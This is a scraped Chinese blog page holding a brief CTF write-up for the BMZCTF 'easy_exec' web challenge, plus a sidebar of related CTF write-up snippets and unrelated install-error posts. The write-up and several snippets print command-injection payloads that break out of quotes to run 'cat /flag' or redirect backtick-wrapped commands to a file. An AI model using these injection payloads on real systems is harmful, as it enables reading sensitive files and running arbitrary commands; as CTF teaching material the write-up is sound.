BMZCTF:easy_exec

2021-02-07 15:14:31 102 收藏
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/113741411
版权 
http://bmzclub.cn/challenges#easy_exec

在这里插入图片描述
在这里插入图片描述
查看源码也没发现什么,尝试目录扫描在这里插入图片描述
发现有个index.html,访问查看源码,发现de.php
在这里插入图片描述
在这里插入图片描述
这题我看搞不懂搞两个正则匹配在这干啥,又没有起到过滤作用,直接双引号闭合,然后执行命令

?comm1=/flag";cat /flag;"&comm2=/etc/passwd

在这里插入图片描述

已标记关键词 清除标记
关于BMZCTF中 shell_exec的解法详解
weixin_40228200的博客
01-15 46
BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此写了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
BMZCTF WEB easy_exec
Crazy198410的博客
01-25 61
打开页面: 显示:no file 查看源码: 发现新的页面de.php,打开: 可以看到源码 要我们输入两个参数,最后与file拼接,再执行。 知道原理后,开始分析代码: <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; #输入第一个参数 $comm2 = $_GET['comm2']; #输入第二个参数 if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|.
表情包
插入表情
还能输入1000个字符
相关推荐
BMZCTF shell_exec
qq_26243045的博客
11-28 92
考点:命令执行 打开题目能猜出来是考命令执行。 做了半天发现底部有个语法提示。 过滤了很多命令,但是head还可以执行。用在取反符号中写入命令,完整payload `head$IFS$9/fla?$IFS$9>1.txt` 拿到flag ...
BMZCTF:shell_exec
末初
01-24 91
http://bmzclub.cn/challenges#shell_exec 命令执行绕过 ping -c 2 "$_POST[ip]" 2>&1 2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件即以下这种形式 ping -c 2 "command>1.txt" 2>&1 fuzz一下发现同时还过滤了很多关键字符,但是发现没有过滤反引号,即可构造 `ls>1.txt`
第一届BMZCTF公开赛-WEB-Writeup
末初
12-30 2020
文章目录ezevalezphppenetrationBMZ_Market 前言 首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初 以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正 ezeval <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_li
ubuntu安装easy_install命令方法,mysql-python安装时EnvironmentError: mysql_config not found
ghostyusheng 's blog
08-22 2006
sudo apt-get install python-setuptools python-dev build-essential 1 sh: mysql_config: not found Traceback (most recent call last):   File "setup.py", line 15, in     metadata, options = get_
php报错is_dir():open_basedir restriction in effect.
王梦蛟的博客
10-26 5588
php报错is_dir():open_basedir restriction in effect. File(.log) is not within the allowed path(s) 这种情况为open_basedir限制了PHP可以操作的文件目录,开发环境不考虑安全问题的话,如果需要操作这些文件,解决方法可以是: 在LNMP环境下, 1.直接修改Nginx的配置文件 fastcgi....
BMZCTF:2018 护网杯 easy_dump
末初
12-18 195
http://bmzclub.cn/challenges#2018%20%E6%8A%A4%E7%BD%91%E6%9D%AF%20easy_dump 题目描述 the flag format:flag{} easy_dump.img volatility -f easy_dump.img imageinfo volatility -f easy_dump.img --profile=Win7SP1x64 pslist 有几个可疑进程: notepad.exe DumpIt.exe expl
easy_install: command not found 的解决办法
weixin_43256057的博客
11-09 5294
因为 hellopython@ubuntu:~$ mkvirtualenv -p /user/local/bin/python3 dm mkvirtualenv: command not found 所以参照了 https://blog.csdn.net/liu_xzhen/article/details/79293373 ,结果: hellopython@ubuntu:~$ sudo easy...
BMZCTF WEB shell_exec
Crazy198410的博客
01-25 38
打开页面发现是个ping的页面: 尝试了几个命令执行的方法,均无返回结果: 查看源代码: 发现了下面的命令: ping -c 2 "$_POST[ip]" 2>&1 后面的2>&1的意思是:标准错误重定向到标准输出。 也就是说我们在网页的输入,当遇错时,结果会被输出到一个地方,而我们没有指定,所以看不到。 知道原理了,那么我们开始构造payload: 1、要程序运行错误; 2、要指定输出位置。 由于页面带过滤,经过多次尝试:发现 #以下被过滤 cat tac less m.
python安装 pip安装 easy_install安装 setuptools安装 virtualenv安装
Aidon博客
08-16 5374
python安装 pip安装 easy_install安装 setuptools安装 virtualenv安装,linux 下python安装 pip安装 easy_install安装 setuptools安装 virtualenv安装。python安装 pip安装 easy_install安装 setuptools安装 virtualenv安装,linux 下python安装 pip安装 easy_install安装 setuptools安装 virtualenv安装。
-bash: pip: command not found && easy_install 命令错误,解决python升级后pip安装无法使用
Solar's Blog
01-12 5425
实验环境: centos6.10 python2.6升级到python2.7 Ubuntu16.4 python2.7升级到python3.5 如何安装pip,这里就不介绍了,主要提一下安装后所遇到的各种问题,同时也将自己所遇到的问题做个小结。 1.ImportError: No module named pkg_resources 这里针对Ubuntu系统给出一种简单的方法,但不确定对ce...
错误:Easy_install and pip broke: pkg_resources.DistributionNotFound: distribute==0.6.10
win_turn的博客
06-04 7916
Python的包管理工具常见的有easy_install, setuptools, 还有pip, distribute,那麽这几个工具有什么关系呢,看一下下面这个图就明白了:可以看到distribute是setuptools的替代方案,pip是easy_install的替代方案。Distribute提供一个安装python模块的框架。
基础知识(九)boost+vs2015安装配置
hjimce的专栏
01-11 4494
在调用boost头文件的时候采用: #include "boost/program_options.hpp" #include "boost/filesystem.hpp"结果出现了连接错误: 1> 正在创建库 C:\Users\Administrator\Desktop\facereconstruction\Release\facereconstruction.lib 和对象 C:\U
docker 启动报错: standard_init_linux.go:211: exec user process caused "no such file or directory"
appcanLiYunLong的博客
01-06 1599
参考这篇文章恍然大明白;文章地址
easy_install 和 pip
01-28 123
原文章:http://blog.csdn.net/xsj_blog/article/details/52037609 easy_install 和 pip的介绍: easy_install和pip都是用来下载安装Python一个公共资源库PyPI的相关资源包的,pip是easy_install的改进版,提供更好的提示信息,删除package等功能。老版本的python中只...
BUU CTF web题write up
0xdawn的博客
12-10 1646
0x01 WarmUp 进来就是一个大大的滑稽,F12拿到源码链接source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["sour...
2019 moeCTF新生题 部分wp
xiaohuihui的博客
09-15 4734
author: xiaohuihui statis:持续更新 这篇博客是博主参加moeCTF后写的WP,一方面记录一下,另一方面分享部分心得给广大互联网的朋友。题目附件可以去 moectf 官方网站 下载,也可以留邮箱。后期可能会放出网盘链接。本 blog尽可能收录所有赛题,标题中带有 × 的表示博主尚未解出。
序列化和反序列化刷题记录
一只菜鸡
01-28 188
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
©️2020 CSDN 皮肤主题: 撸撸猫 设计师:C马雯娟 返回首页